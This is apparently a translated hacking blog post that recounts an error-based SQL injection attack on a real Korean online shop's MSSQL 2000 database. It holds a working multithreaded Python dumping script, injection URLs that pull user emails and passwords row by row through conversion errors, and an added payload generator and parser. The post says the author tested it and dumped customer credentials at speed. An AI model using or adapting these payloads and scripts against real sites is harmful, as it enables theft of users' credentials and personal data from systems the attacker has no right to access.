A Korean pork shop site: MSSQL 2000 with the database on a separate host, DB_OWNER privileges. The database box sits on the internal network and cannot reach the Internet, so nothing could be bounced back to my machine; since the goal was just the data, I couldn't be bothered to look for another way to get a shell.

```python
#!/usr/bin/env python
#Code by Pnig0s1992
#TeAm:FreeBuf
#Date:2011.10.17
# Python 2 script: reads one injection URL per line from data.txt, fetches each
# one with a pool of worker threads, and appends the string leaked between the
# R! and !R markers of the MSSQL conversion error to result.txt.
import Queue
import threading
import urllib
import time

# one payload URL per line; strip the newline so it is not sent as %0A
fd = open('data.txt', 'r')
hosts = [line.strip() for line in fd if line.strip()]
fd.close()

list_len = len(hosts)

queue = Queue.Queue()
write_lock = threading.Lock()   # serialise appends to result.txt across threads


class ThreadUrl(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while True:
            # grab one payload URL from the queue
            host = self.queue.get()
            # leave the SQL syntax characters unencoded, encode the rest
            enurl = urllib.quote_plus(host, safe='\':/?-&*.=-()%,+')
            rs = urllib.urlopen(enurl)
            getItem = rs.read()
            rs.close()
            # the payload wraps the leaked row in R! ... !R
            Begin = getItem.find('R!')
            End = getItem.find('!R')
            if Begin != -1 and End > Begin:
                data = getItem[Begin + 2:End].strip()
                with write_lock:
                    fd = open('result.txt', 'a')
                    fd.write(data + "\n")
                    fd.close()
                print "%s" % data
            self.queue.task_done()


start = time.time()


def main():
    print "###############################"
    print "# MultiThread dumping script #"
    print "# Code By:Pnig0s1992 #"
    print "# TeAm:FreeBuf #"
    print "# http://www./ #"
    print "###############################"
    print "%d payloads loaded" % list_len
    # spawn a pool of worker threads and hand them the queue
    for i in range(10):
        t = ThreadUrl(queue)
        t.setDaemon(True)
        t.start()

    # populate the queue with the payload URLs
    for host in hosts:
        queue.put(host)

    # block until every payload has been processed
    queue.join()


main()
print "Elapsed Time: %s" % (time.time() - start)
```
data.txt holds the SQL statements, one per line; these were also generated with Python:

```text
http://www./xxx.asp?id=convert(int,(char(82)%2bchar(33)%2b(select+top+1+isnull([USER_email],char(32))%2bchar(94)%2bisnull([user_passwd],char(32))+from+(select+top+2015+[USER_Email],[USER_Passwd],[User_ID]+from+[USER]+order+by+[USER_ID]+asc)+sq+order+by+[USER_ID]+desc)%2bchar(33)%2bchar(82)))+and+11=1
http://www./xxx.asp?id=convert(int,(char(82)%2bchar(33)%2b(select+top+1+isnull([USER_email],char(32))%2bchar(94)%2bisnull([user_passwd],char(32))+from+(select+top+2016+[USER_Email],[USER_Passwd],[User_ID]+from+[USER]+order+by+[USER_ID]+asc)+sq+order+by+[USER_ID]+desc)%2bchar(33)%2bchar(82)))+and+11=1
http://www./xxx.asp?id=convert(int,(char(82)%2bchar(33)%2b(select+top+1+isnull([USER_email],char(32))%2bchar(94)%2bisnull([user_passwd],char(32))+from+(select+top+2017+[USER_Email],[USER_Passwd],[User_Id]+from+[USER]+order+by+[USER_Id]+asc)+sq+order+by+[USER_Id]+desc)%2bchar(33)%2bchar(82)))+and+11=1
```
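The payloads above all follow one pattern: the inner `top N ... order by [USER_ID] asc` keeps rows 1..N, the outer `top 1 ... order by [USER_ID] desc` picks the last of them (row N; MSSQL 2000 has no ROW_NUMBER()), the row is wrapped in `R!`/`!R` via `char(82)+char(33)`, and `convert(int, ...)` forces the conversion error that echoes it back. The following is an added example in Python 3, not the post's own generator: it builds the data.txt lines for a range of rows and parses the leaked row out of the error page. Table, column and key names are those in the post's payloads; the target host is the post's redacted placeholder, and the error page is constructed for the demo.

```python
# Added example (Python 3), not the post's own generator: build the per-row
# error-based payloads that go into data.txt and pull the leaked row back
# out of the MSSQL 2000 conversion error.  Table, column and key names are
# the ones in the post's payloads; the target host is the post's redacted
# placeholder, and the error page below is constructed for the demo.
import re

BASE_URL = "http://www./xxx.asp?id="   # redacted target from the post

# The payload wraps the row in R! ... !R, so the parser does not depend on
# the exact wording of the database error message.
LEAK_RE = re.compile(r"R!(.*?)!R", re.S)


def row_sql(n, table="[USER]", key="[USER_ID]",
            cols=("[USER_Email]", "[USER_Passwd]")):
    """SQL that makes MSSQL 2000 leak the n-th row (1-based, ordered by key).

    isnull(col, char(32)) keeps a NULL column from turning the whole
    concatenation into NULL; char(94) is the '^' field separator;
    convert(int, ...) on the non-numeric string raises the error that
    carries the row back to the client.
    """
    picked = "+char(94)+".join("isnull(%s,char(32))" % c for c in cols)
    inner = "select top %d %s from %s order by %s asc" % (
        n, ",".join(cols + (key,)), table, key)
    return ("convert(int,(char(82)+char(33)+(select top 1 %s from (%s) sq "
            "order by %s desc)+char(33)+char(82)))" % (picked, inner, key))


def row_url(n, **kw):
    """Encode the SQL the way the post's data.txt lines do: the SQL string
    concatenation '+' becomes %2b (a bare '+' would decode to a space) and
    spaces become '+'; brackets and parentheses are left as they are."""
    sql = row_sql(n, **kw).replace("+", "%2b").replace(" ", "+")
    return BASE_URL + sql + "+and+11=1"


def payload_lines(first, last, **kw):
    """One URL per row for data.txt, rows first..last inclusive."""
    return [row_url(n, **kw) for n in range(first, last + 1)]


def extract_leak(page):
    """Return (email, password) from an error page, or None when the page
    carries no R!...!R marker (the query failed for some other reason).
    The post's script used len(data) < 100 as a proxy for this check."""
    m = LEAK_RE.search(page)
    if m is None:
        return None
    email, _, passwd = m.group(1).partition("^")   # char(94) separator
    return email.strip(), passwd.strip()


# Constructed MSSQL 2000 error page for the demo (not captured from a target).
SAMPLE_ERROR_PAGE = (
    "Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
    "Syntax error converting the varchar value 'R!kim@example.kr^hunter2!R' "
    "to a column of data type int.<br>/xxx.asp, line 12"
)

if __name__ == "__main__":
    for line in payload_lines(2015, 2017):
        print(line)
    print(extract_leak(SAMPLE_ERROR_PAGE))
```

Checking for the markers instead of the length of the captured text is the one behavioural difference from the post's script: a short error page with no marker (a timeout page, a different SQL error) returns None rather than being written to result.txt. The `^` separator is only unambiguous if the first column cannot contain `^`; `partition` splits on the first one, which is correct for an e-mail address.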
result.txt holds the dumped data:
![](http://image68.360doc.com/DownloadImg/2014/01/2309/38484874_1.png)
Tested it, and the speed is good: with 20 threads over a Korean VPN it takes under half a second per row. Python multithreading is quite stable after all.
This article is from the "About:Blank H4cking" blog; please keep this source: http://pnig0s1992.blog.51cto.com/393390/690408